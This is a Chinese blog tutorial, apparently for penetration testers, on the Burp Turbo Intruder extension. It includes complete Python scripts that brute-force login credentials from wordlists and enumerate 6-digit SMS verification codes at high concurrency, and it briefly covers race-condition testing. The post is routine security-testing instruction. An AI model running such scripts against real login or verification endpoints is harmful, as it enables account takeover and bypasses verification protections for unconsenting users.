Turbo Intruder

基础使用总结,把Python代码都记录下,要是有啥骚姿势,求各位师傅交流。

个人感觉超强的一款Burp插件,反正超快

Link: https://github.com/PortSwigger/turbo-intruder/,https://youtu.be/vCpIAsxESFY,https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack

视频里有讲解底层原理

Install

Extender -> BApp Store -> Turbo Intruder

Or

手动下载 -> 导入

https://github.com/PortSwigger/turbo-intruder/

我是选择的这种办法,网太垃圾的原因吧,Store里install一直装不上

基础使用

直接抓取数据包右键发送过去就可以



有上下两块

就拿爆破目录来举例吧

要fuzz的点用%s来顶上

选择爆破点 -> 加载字典 -> Attack



要看和普通burp里的intruder的速度差距自己试试就知道了哈哈

既然这么快,那么挖掘任意用户注册和登录是不是很爽呢,以后补挖掘案例(2020.11.24,12:14)

提升速度



想要大大提升速度,就把pipeline设置成True

pipeline学过http request smuggling的应该都知道是啥了吧(手动滑稽)

爆破user&pass

from urllib import quote

def password_brute(target,engine):

 for word in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):

       engine.queue(target.req, quote(word.rstrip()))

def user_brute(target,engine):

 for word in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):

       engine.queue(target.req, quote(word.rstrip()))

def user_password_brute(target, engine):

 for password in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):

   for user in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):

          engine.queue(target.req, [quote(user.rstrip()),quote(password.rstrip())])

def queueRequests(target, wordlists):

   engine = RequestEngine(endpoint=target.endpoint,

           concurrentConnections=5,

           requestsPerConnection=100,

           pipeline=True

           )

   #user_brute(target,engine)

   #password_brute(target,engine)

   user_password_brute(target,engine)

def handleResponse(req, interesting):

# currently available attributes are req.status, req.wordcount, req.length and req.response

   if req.status == 200:

      table.add(req)

if条件 可以自己更改

需要用哪个就用哪个,不需要就注释

爆破数字验证码

最后的数字假如是4位验证码就传4,6就是6

from itertools import product

def brute_veify_code(target, engine, length):

   pattern = '1234567890'

   for i in list(product(pattern, repeat=length)):

        code =  ''.join(i)

        engine.queue(target.req, code)

def queueRequests(target, wordlists):

   engine = RequestEngine(endpoint=target.endpoint,

           concurrentConnections=30,

           requestsPerConnection=100,

           pipeline=True

           )

   brute_veify_code(target, engine, 6)

def handleResponse(req, interesting):

# currently available attributes are req.status, req.wordcount, req.length and req.response

 if 'error' not in req.response:

      table.add(req)

不做演示了

并发漏洞

这个就直接实战吧 哈哈



这里有个注意点concurrentConnections和for循环的次数,大家自己尝试哈哈

垃圾接码平台,最后还是用的自己的手机号测试的 淦



写个笔记还浪费我的短信费 哭了呜呜

Burp - Turbo Intruder的更多相关文章

  1. Burp Suite Intruder中爆破模式介绍

    Burp Suite Intruder中爆破模式介绍 - Introduction to Burst Mode in Burp Suite Intruder 1.sniper模式  使用单一的Payl ...

  2. Burp Suite Intruder Module - 攻击模块

    参考链接:https://portswigger.net/burp/documentation/desktop/tools/intruder/using 主要思路:在Intruder模块下设定Targ ...

  3. Burp Suite Intruder的4种攻击类型

    位置:Intruder>1(通常为数字)>Positions,Attack Type下拉有四种,分别为 一.Sniper(狙击手模式) 狙击手模式使用一组payload集合,它一次只使用一 ...

  4. Burp 之Intruder

    攻击类型: (1)Sniper:测试完第一个变量后,就测试下一个变量,一次向下测试,每次只测试一个变量 适用于单变量 (2)Battering ram:只有一个payload,该payload会同时测 ...

  5. 关于Burp Suite Intruder 的四种攻击方式

    以下面这一段参数为例,被§§包围的部分为需要破解的部分: user=§ss§&password=§zxcv§&imageField.x=17&imageField.y=1 (1 ...

  6. 利用Burp Suite攻击Web应用

    i春秋作家:Passerby2 web应用测试综述: Web应用漏洞给企业信息系统造成了很大的风险.许多web应用程序漏洞是由于web应用程序缺乏对输入的过滤.简而言之Web应用程序利用来自用户的某种 ...

  7. Burpsuite模块—-Intruder模块详解

    一.简介 Burp Intruder是一个强大的工具,用于自动对Web应用程序自定义的攻击,Burp Intruder 是高度可配置的,并被用来在广范围内进行自动化攻击.你可以使用 Burp Intr ...

  8. Burp Suite基本用法

    从上一篇已经知道Burp Suite安装.启动方法,本章将会阐述Burp Suite抓包.重放.爆破.双参数爆破.爬虫等基本用法.同博客园看到一篇描述Burp Suite界面各个字段和按钮作用,感兴趣 ...

  9. Burp Suite 入门教程(BURP SUITE TUTORIAL )

    参考链接1:https://www.pentestgeek.com/what-is-burpsuite 参考链接2:https://www.pentestgeek.com/web-applicatio ...

随机推荐

  1. unity的安装,配置,及问题

    下载unity 在官网下载unity unity有三个版本,个人版免费,pro和专业版收费. 个人版 在导出exe文件时不能去掉水印片头.其他版本可以. 地址[https://store.unity. ...

  2. 22、正则表达式(用于三剑客grep,awk,sed,内容中包含空行)

    简单的说就是为处理大量的字符串而定义的一套规则和方法,通过定义特殊符号的辅助,系统管理员就可以快速过滤,替换城输出需要的字符串 : ^:^word 表示匹配以什么字符开头的内容: $:word$表示匹 ...

  3. 38、tftp搭建

    38.1.什么是tftp: TFTP(Trivial File Transfer Protocol,简单文件传输协议)是TCP/IP协议族中的一个用来在客户机与服务器之间进行简单文 件传输的协议,提供 ...

  4. .NET Core如何全局获取用户信息?

    前言 在增删改查中的增和改操作中,我们经常需要更新数据流的创建人和修改人,无论我们项目是基于DDD,抑或是简单仅有服务层,此时我们都需要获取用户信息,那么我们只能将用户标识从控制器层层传递到服务或仓储 ...

  5. POJ 3087 Shuffle'm Up 模拟,看着不像搜索啊

    题意:给定s1,s1两副扑克,顺序从下到上.依次将s2,s1的扑克一张一张混合.例如s1,ABC; s2,DEF. 则第一次混合后为DAEBFC. 然后令前半段为s1, 后半段为s2. 如果可以变换成 ...

  6. k8s部署docker容器

    一.环境 需机器已部署好k8s和docker的环境 二.操作步骤 1.将制作好的镜像推送到docker仓库 docker tag nginx:test harbor:test-nginx docker ...

  7. SpringMVC(12)完结篇 基于Hibernate+Spring+Spring MVC+Bootstrap的管理系统实现

    到这里已经写到第12篇了,前11篇基本上把Spring MVC主要的内容都讲了,现在就直接上一个项目吧,希望能对有需要的朋友有一些帮助. 一.首先看一下项目结构: InfrastructureProj ...

  8. pdfkit html转pdf

    pdfkit的通用option选项 参考:https://cloud.tencent.com/developer/ask/202116https://www.cnblogs.com/taceywong ...

  9. Ha1cyon-CTF 芜湖

    感觉自己还是很欠缺的,尤其是C++的逆向,对stl的不熟悉,直接误导我静态分析了...然后这种题和平常不同的是没有任何混淆和flag验证,需要的是耐心的分析,在过程中,找到线索,这题还考了base64 ...

  10. mongodb常用查询语句(转)

    1.查询所有记录 db.userInfo.find();相当于:select* from userInfo; 2.查询去掉后的当前聚集集合中的某列的重复数据db.userInfo.distinct(& ...